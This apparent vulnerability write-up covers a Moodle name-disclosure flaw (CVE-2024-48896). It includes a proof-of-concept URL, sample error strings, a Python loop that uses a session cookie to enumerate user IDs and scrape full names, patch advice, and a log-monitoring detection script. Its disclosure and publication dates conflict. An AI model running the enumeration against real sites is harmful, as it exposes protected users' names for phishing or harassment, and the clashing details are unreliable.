Moodle is one of the most popular learning management systems (LMS) used worldwide, supporting millions of learners and teachers. On May 31, 2024, a new vulnerability was disclosed, tracked as CVE-2024-48896. This flaw affects how user names can be exposed through the Messaging system in Moodle. While it does not give full account access, this bug can leak the full names of users who should be hidden from certain roles, breaking privacy expectations.

Below, you’ll find a breakdown of what the problem is, how it works, and a simple demonstration of the process for educational and defensive purposes.

What is CVE-2024-48896?

CVE-2024-48896 is an information disclosure vulnerability in Moodle's Messaging system. Under certain configurations, users with the "send message" capability can deliberately trigger an error that leaks the full names of users to whom they should not have access – names that would not be visible based on roles, groups, or privacy settings.

The name returned by the error uses the full name format configured for the Moodle site – meaning that an attacker could collect first names, last names, or even custom name formats if the administrator has set them.

Scenario

Let’s say your Moodle is set up so that teachers in one course are not supposed to see the names of students in another course. However, if those teachers have "send message" capability, they can craft a special request or use the messaging interface in a way that tries to send a message to users outside their group. In doing this, if they purposely access a user ID they shouldn’t, the error message returned by Moodle includes the full name of the user.

Why does this happen?

This happens because the validity of the user ID is checked *after* trying to use the target user's data. The resulting error message returns something like:

> "User John Doe (ID: 1234) not found or accessible."

This is a classic "over-sharing" error message – it gives away the very detail that access controls were supposed to keep private.

Exploit Details (With Code Example)

Let’s walk through a proof-of-concept to show how this can be exploited. Important: This is for educational/defensive use with permission and does not include exploitation of any real site.

Step 1: Identify a Target User ID

If you know or can guess a user ID (such as 2, 3, 100, etc.), proceed to the next step.

Step 2: Send a Direct Message via URL

Try to compose a message from the web interface to a user you should NOT be able to contact. Often this will show a generic error.

You can craft a URL like:

https://yourmoodlesite.com/message/index.php?user1=YOUR_USER_ID&user2=TARGET_USER_ID

For example:

https://school.moodle.edu/message/index.php?user1=14&user2=234

If your permissions are restricted, you’ll get an error like:

You cannot message this user: Jane Smith (ID: 234).

Or:

User John Doe not found or you do not have permission to message this user.

Even though you can’t contact the user, the site reveals their full name based on the configured name format.

Below is a simple Python snippet using requests to enumerate user names:

import requests

base_url = "https://school.moodle.edu/message/index.php"
cookies = {'MoodleSession': 'YOUR_SESSION_COOKIE'}   # Replace with real session cookie

for user_id in range(1, 100):
    params = {
        'user1': '14',      # your user ID
        'user2': str(user_id)
    }
    resp = requests.get(base_url, params=params, cookies=cookies)
    if "You cannot message this user:" in resp.text:
        name = resp.text.split("You cannot message this user:")[1].split(".")[0].strip()
        print(f"User ID {user_id}: {name}")

*This code is for defensive/educational research on your own authorized Moodle instance.*

Moodle 4.2.4 and above

It is highly recommended to update immediately to the latest fixed version.

Moodle’s security advisory:
- MSA-24-0013: Information disclosure in messaging error message
- CVE Detail Page: CVE-2024-48896

- Limit who gets the "send message" capability via Roles and Permissions.

- Monitor logs for suspicious direct access to /message/index.php.
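
One way to act on the log-monitoring advice, as an added example (not code from Moodle or its advisory): it scans web server access-log lines for a single client requesting /message/index.php with many distinct `user2` values in a short window, which is the pattern the enumeration above leaves behind. The Combined Log Format, the threshold of 5 IDs, the 10-minute window and the sample lines are all assumptions made for this illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client IP, [timestamp], "METHOD target PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3} '
)

def find_enumeration(lines, threshold=5, window=timedelta(minutes=10)):
    """Return {(client_ip, user1): sorted user2 ids} for clients that hit
    /message/index.php with >= threshold distinct user2 ids inside one window."""
    hits = defaultdict(list)              # (ip, user1) -> [(time, user2), ...]
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                      # not an access-log line we understand
        url = urlsplit(m["target"])
        if not url.path.endswith("/message/index.php"):
            continue
        qs = parse_qs(url.query)
        user2 = qs.get("user2", [""])[0]
        if not user2.isdigit():
            continue                      # no target user id in the query string
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        hits[(m["ip"], qs.get("user1", ["-"])[0])].append((when, int(user2)))

    flagged = {}
    for key, events in hits.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            # distinct target ids requested within `window` of this event
            ids = {uid for t, uid in events[i:] if t - start <= window}
            if len(ids) >= threshold:
                flagged[key] = sorted(ids)
                break
    return flagged

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [20/Nov/2024:10:00:{i:02d} +0000] '
    f'"GET /message/index.php?user1=14&user2={i} HTTP/1.1" 200 5120'
    for i in range(1, 9)
] + [
    '198.51.100.20 - - [20/Nov/2024:10:01:00 +0000] "GET /message/index.php?user1=31&user2=40 HTTP/1.1" 200 7000',
    '198.51.100.20 - - [20/Nov/2024:10:05:00 +0000] "GET /message/index.php?user1=31&user2=41 HTTP/1.1" 200 7000',
    '198.51.100.20 - - [20/Nov/2024:10:06:00 +0000] "GET /course/view.php?id=2 HTTP/1.1" 200 9000',
]
print(find_enumeration(SAMPLE_LOG))
```

Requests that carry the target ID in a POST body do not show up in the query string, so this covers only the GET pattern shown earlier; tune the threshold against normal messaging activity on your site.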

Conclusion

CVE-2024-48896 is a privacy issue with real-world impact: a user with seemingly limited rights can enumerate the full names of otherwise-protected users just by triggering error responses in the messaging system. This may be leveraged for targeted phishing, harassment, or privacy violation.

Always keep your LMS software up-to-date and review permission settings regularly. Error messages should never reveal information that would otherwise require higher privileges.

Timeline

Published on: 11/18/2024 12:15:18 UTC
Last modified on: 11/20/2024 14:47:12 UTC